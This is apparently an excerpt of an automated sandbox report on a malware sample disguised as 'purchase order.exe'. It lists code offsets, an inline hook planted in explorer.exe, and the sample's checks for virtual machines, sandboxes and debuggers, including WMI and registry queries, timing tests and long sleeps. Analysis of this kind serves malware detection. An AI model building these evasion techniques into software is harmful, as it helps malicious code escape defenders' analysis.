Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_06A2E18D push FFFFFF8Bh; iretd 0_2_06A2E18F
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041D075 push eax; ret 2_2_0041D0C8
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041C802 push esi; iretd 2_2_0041C803
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041D0C2 push eax; ret 2_2_0041D0C8
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041D0CB push eax; ret 2_2_0041D132
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041E172 pushfd ; ret 2_2_0041E174
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041D12C push eax; ret 2_2_0041D132
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_004182CC push cs; retf 2_2_004182CE
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041E4F5 push dword ptr [537421FAh]; ret 2_2_0041E515
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00419C92 pushfd ; iretd 2_2_00419C98
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041674D push 8EAE14C8h; iretd 2_2_00416753
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_004167AE push C6E9D42Ah; ret 2_2_004167C2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017FD0D1 push ecx; ret 2_2_017FD0E4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048AD0D1 push ecx; ret 5_2_048AD0E4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063D075 push eax; ret 5_2_0063D0C8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063C802 push esi; iretd 5_2_0063C803
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063D0C2 push eax; ret 5_2_0063D0C8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063D0CB push eax; ret 5_2_0063D132
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063E172 pushfd ; ret 5_2_0063E174
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063D12C push eax; ret 5_2_0063D132
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_006382CC push cs; retf 5_2_006382CE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063E4F5 push dword ptr [537421FAh]; ret 5_2_0063E515
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_00639C92 pushfd ; iretd 5_2_00639C98
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063674D push 8EAE14C8h; iretd 5_2_00636753
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_006367AE push C6E9D42Ah; ret 5_2_006367C2
Source: initial sample Static PE information: section name: .text entropy: 7.23319521913

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xEE
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match File source: 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: purchase order.exe PID: 3900, type: MEMORY
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\purchase order.exe WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: purchase order.exe, 00000000.00000002.355570300.0000000002F00000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\purchase order.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\purchase order.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 00000000006298E4 second address: 00000000006298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000000629B4E second address: 0000000000629B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\purchase order.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
Source: C:\Users\user\Desktop\purchase order.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\purchase order.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\purchase order.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
Source: C:\Users\user\Desktop\purchase order.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00409A80 rdtsc 2_2_00409A80
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\purchase order.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\purchase order.exe TID: 5016 Thread sleep time: -49972s >= -30000s
Source: C:\Users\user\Desktop\purchase order.exe TID: 4456 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 7048 Thread sleep time: -64000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
Source: explorer.exe, 00000003.00000000.378092448.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.378015974.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.373701178.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
Source: explorer.exe, 00000003.00000000.374586186.0000000006410000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.612924741.00000000062E0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: purchase order.exe, 00000000.00000002.355570300.0000000002F00000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 00000003.00000000.373701178.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.381193325.000000000D484000.00000004.00000001.sdmp Binary or memory string: 8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: purchase order.exe, 00000000.00000002.355593298.0000000002F08000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000003.00000000.378386869.0000000008540000.00000004.00000001.sdmp Binary or memory string: c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&-
Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp Binary or memory string: vmware
Source: purchase order.exe, 00000000.00000002.355570300.0000000002F00000.00000004.00000001.sdmp Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.378015974.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000000.377852959.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000003.00000000.373701178.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.377852959.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: purchase order.exe, 00000000.00000002.355570300.0000000002F00000.00000004.00000001.sdmp Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000003.00000000.378092448.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000003.00000000.373701178.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000003.00000000.357823561.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Users\user\Desktop\purchase order.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\purchase order.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\msdt.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00409A80 rdtsc 2_2_00409A80
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0040ACC0 LdrLoadDll, 2_2_0040ACC0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AB171 mov eax, dword ptr fs:[00000030h] 2_2_017AB171
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AB171 mov eax, dword ptr fs:[00000030h] 2_2_017AB171
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AC962 mov eax, dword ptr fs:[00000030h] 2_2_017AC962
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018269A6 mov eax, dword ptr fs:[00000030h] 2_2_018269A6
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CB944 mov eax, dword ptr fs:[00000030h] 2_2_017CB944
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CB944 mov eax, dword ptr fs:[00000030h] 2_2_017CB944
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018251BE mov eax, dword ptr fs:[00000030h] 2_2_018251BE
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018251BE mov eax, dword ptr fs:[00000030h] 2_2_018251BE
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018251BE mov eax, dword ptr fs:[00000030h] 2_2_018251BE
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018251BE mov eax, dword ptr fs:[00000030h] 2_2_018251BE
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D513A mov eax, dword ptr fs:[00000030h] 2_2_017D513A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D513A mov eax, dword ptr fs:[00000030h] 2_2_017D513A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C4120 mov eax, dword ptr fs:[00000030h] 2_2_017C4120
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C4120 mov eax, dword ptr fs:[00000030h] 2_2_017C4120
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C4120 mov eax, dword ptr fs:[00000030h] 2_2_017C4120
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C4120 mov eax, dword ptr fs:[00000030h] 2_2_017C4120
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C4120 mov ecx, dword ptr fs:[00000030h] 2_2_017C4120
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018341E8 mov eax, dword ptr fs:[00000030h] 2_2_018341E8
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A9100 mov eax, dword ptr fs:[00000030h] 2_2_017A9100
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A9100 mov eax, dword ptr fs:[00000030h] 2_2_017A9100
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A9100 mov eax, dword ptr fs:[00000030h] 2_2_017A9100
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AB1E1 mov eax, dword ptr fs:[00000030h] 2_2_017AB1E1
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D61A0 mov eax, dword ptr fs:[00000030h] 2_2_017D61A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D2990 mov eax, dword ptr fs:[00000030h] 2_2_017D2990
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DA185 mov eax, dword ptr fs:[00000030h] 2_2_017DA185
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CC182 mov eax, dword ptr fs:[00000030h] 2_2_017CC182
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01823884 mov eax, dword ptr fs:[00000030h] 2_2_01823884
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C0050 mov eax, dword ptr fs:[00000030h] 2_2_017C0050
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D002D mov eax, dword ptr fs:[00000030h] 2_2_017D002D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BB02A mov eax, dword ptr fs:[00000030h] 2_2_017BB02A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0183B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0183B8D0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0183B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_0183B8D0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01874015 mov eax, dword ptr fs:[00000030h] 2_2_01874015
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01827016 mov eax, dword ptr fs:[00000030h] 2_2_01827016
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A58EC mov eax, dword ptr fs:[00000030h] 2_2_017A58EC
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DF0BF mov ecx, dword ptr fs:[00000030h] 2_2_017DF0BF
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DF0BF mov eax, dword ptr fs:[00000030h] 2_2_017DF0BF
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E90AF mov eax, dword ptr fs:[00000030h] 2_2_017E90AF
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D20A0 mov eax, dword ptr fs:[00000030h] 2_2_017D20A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01871074 mov eax, dword ptr fs:[00000030h] 2_2_01871074
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01862073 mov eax, dword ptr fs:[00000030h] 2_2_01862073
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A9080 mov eax, dword ptr fs:[00000030h] 2_2_017A9080
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0185D380 mov ecx, dword ptr fs:[00000030h] 2_2_0185D380
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D3B7A mov eax, dword ptr fs:[00000030h] 2_2_017D3B7A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186138A mov eax, dword ptr fs:[00000030h] 2_2_0186138A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017ADB60 mov ecx, dword ptr fs:[00000030h] 2_2_017ADB60
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01875BA5 mov eax, dword ptr fs:[00000030h] 2_2_01875BA5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AF358 mov eax, dword ptr fs:[00000030h] 2_2_017AF358
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017ADB40 mov eax, dword ptr fs:[00000030h] 2_2_017ADB40
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018253CA mov eax, dword ptr fs:[00000030h] 2_2_018253CA
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CDBE9 mov eax, dword ptr fs:[00000030h] 2_2_017CDBE9
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186131B mov eax, dword ptr fs:[00000030h] 2_2_0186131B
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D03E2 mov eax, dword ptr fs:[00000030h] 2_2_017D03E2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D4BAD mov eax, dword ptr fs:[00000030h] 2_2_017D4BAD
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01878B58 mov eax, dword ptr fs:[00000030h] 2_2_01878B58
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D2397 mov eax, dword ptr fs:[00000030h] 2_2_017D2397
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DB390 mov eax, dword ptr fs:[00000030h] 2_2_017DB390
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B1B8F mov eax, dword ptr fs:[00000030h] 2_2_017B1B8F
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E927A mov eax, dword ptr fs:[00000030h] 2_2_017E927A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A9240 mov eax, dword ptr fs:[00000030h] 2_2_017A9240
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E4A2C mov eax, dword ptr fs:[00000030h] 2_2_017E4A2C
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C3A1C mov eax, dword ptr fs:[00000030h] 2_2_017C3A1C
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A5210 mov eax, dword ptr fs:[00000030h] 2_2_017A5210
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A5210 mov ecx, dword ptr fs:[00000030h] 2_2_017A5210
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AAA16 mov eax, dword ptr fs:[00000030h] 2_2_017AAA16
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B8A0A mov eax, dword ptr fs:[00000030h] 2_2_017B8A0A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186AA16 mov eax, dword ptr fs:[00000030h] 2_2_0186AA16
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D2AE4 mov eax, dword ptr fs:[00000030h] 2_2_017D2AE4
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D2ACB mov eax, dword ptr fs:[00000030h] 2_2_017D2ACB
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BAAB0 mov eax, dword ptr fs:[00000030h] 2_2_017BAAB0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DFAB0 mov eax, dword ptr fs:[00000030h] 2_2_017DFAB0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186EA55 mov eax, dword ptr fs:[00000030h] 2_2_0186EA55
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01834257 mov eax, dword ptr fs:[00000030h] 2_2_01834257
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A52A5 mov eax, dword ptr fs:[00000030h] 2_2_017A52A5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0185B260 mov eax, dword ptr fs:[00000030h] 2_2_0185B260
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01878A62 mov eax, dword ptr fs:[00000030h] 2_2_01878A62
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DD294 mov eax, dword ptr fs:[00000030h] 2_2_017DD294
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CC577 mov eax, dword ptr fs:[00000030h] 2_2_017CC577
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018705AC mov eax, dword ptr fs:[00000030h] 2_2_018705AC
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C7D50 mov eax, dword ptr fs:[00000030h] 2_2_017C7D50
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E3D43 mov eax, dword ptr fs:[00000030h] 2_2_017E3D43
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D4D3B mov eax, dword ptr fs:[00000030h] 2_2_017D4D3B
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AAD30 mov eax, dword ptr fs:[00000030h] 2_2_017AAD30
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826DC9 mov eax, dword ptr fs:[00000030h] 2_2_01826DC9
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826DC9 mov ecx, dword ptr fs:[00000030h] 2_2_01826DC9
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h] 2_2_017B3D34
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186FDE2 mov eax, dword ptr fs:[00000030h] 2_2_0186FDE2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01858DF1 mov eax, dword ptr fs:[00000030h] 2_2_01858DF1
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BD5E0 mov eax, dword ptr fs:[00000030h] 2_2_017BD5E0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01878D34 mov eax, dword ptr fs:[00000030h] 2_2_01878D34
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0182A537 mov eax, dword ptr fs:[00000030h] 2_2_0182A537
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186E539 mov eax, dword ptr fs:[00000030h] 2_2_0186E539
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01823540 mov eax, dword ptr fs:[00000030h] 2_2_01823540
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D1DB5 mov eax, dword ptr fs:[00000030h] 2_2_017D1DB5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D35A1 mov eax, dword ptr fs:[00000030h] 2_2_017D35A1
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DFD9B mov eax, dword ptr fs:[00000030h] 2_2_017DFD9B
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A2D8A mov eax, dword ptr fs:[00000030h] 2_2_017A2D8A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D2581 mov eax, dword ptr fs:[00000030h] 2_2_017D2581
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C746D mov eax, dword ptr fs:[00000030h] 2_2_017C746D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DA44B mov eax, dword ptr fs:[00000030h] 2_2_017DA44B
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01878CD6 mov eax, dword ptr fs:[00000030h] 2_2_01878CD6
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DBC2C mov eax, dword ptr fs:[00000030h] 2_2_017DBC2C
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826CF0 mov eax, dword ptr fs:[00000030h] 2_2_01826CF0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018614FB mov eax, dword ptr fs:[00000030h] 2_2_018614FB
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h] 2_2_01861C06
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826C0A mov eax, dword ptr fs:[00000030h] 2_2_01826C0A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0187740D mov eax, dword ptr fs:[00000030h] 2_2_0187740D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0183C450 mov eax, dword ptr fs:[00000030h] 2_2_0183C450
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B849B mov eax, dword ptr fs:[00000030h] 2_2_017B849B
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01827794 mov eax, dword ptr fs:[00000030h] 2_2_01827794
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BFF60 mov eax, dword ptr fs:[00000030h] 2_2_017BFF60
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BEF40 mov eax, dword ptr fs:[00000030h] 2_2_017BEF40
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DE730 mov eax, dword ptr fs:[00000030h] 2_2_017DE730
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A4F2E mov eax, dword ptr fs:[00000030h] 2_2_017A4F2E
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CF716 mov eax, dword ptr fs:[00000030h] 2_2_017CF716
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DA70E mov eax, dword ptr fs:[00000030h] 2_2_017DA70E
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0187070D mov eax, dword ptr fs:[00000030h] 2_2_0187070D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E37F5 mov eax, dword ptr fs:[00000030h] 2_2_017E37F5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0183FF10 mov eax, dword ptr fs:[00000030h] 2_2_0183FF10
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01878F6A mov eax, dword ptr fs:[00000030h] 2_2_01878F6A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B8794 mov eax, dword ptr fs:[00000030h] 2_2_017B8794
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0183FE87 mov eax, dword ptr fs:[00000030h] 2_2_0183FE87
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CAE73 mov eax, dword ptr fs:[00000030h] 2_2_017CAE73
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B766D mov eax, dword ptr fs:[00000030h] 2_2_017B766D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01870EA5 mov eax, dword ptr fs:[00000030h] 2_2_01870EA5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018246A7 mov eax, dword ptr fs:[00000030h] 2_2_018246A7
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h] 2_2_017B7E41
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0185FEC0 mov eax, dword ptr fs:[00000030h] 2_2_0185FEC0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01878ED6 mov eax, dword ptr fs:[00000030h] 2_2_01878ED6
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AE620 mov eax, dword ptr fs:[00000030h] 2_2_017AE620
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DA61C mov eax, dword ptr fs:[00000030h] 2_2_017DA61C
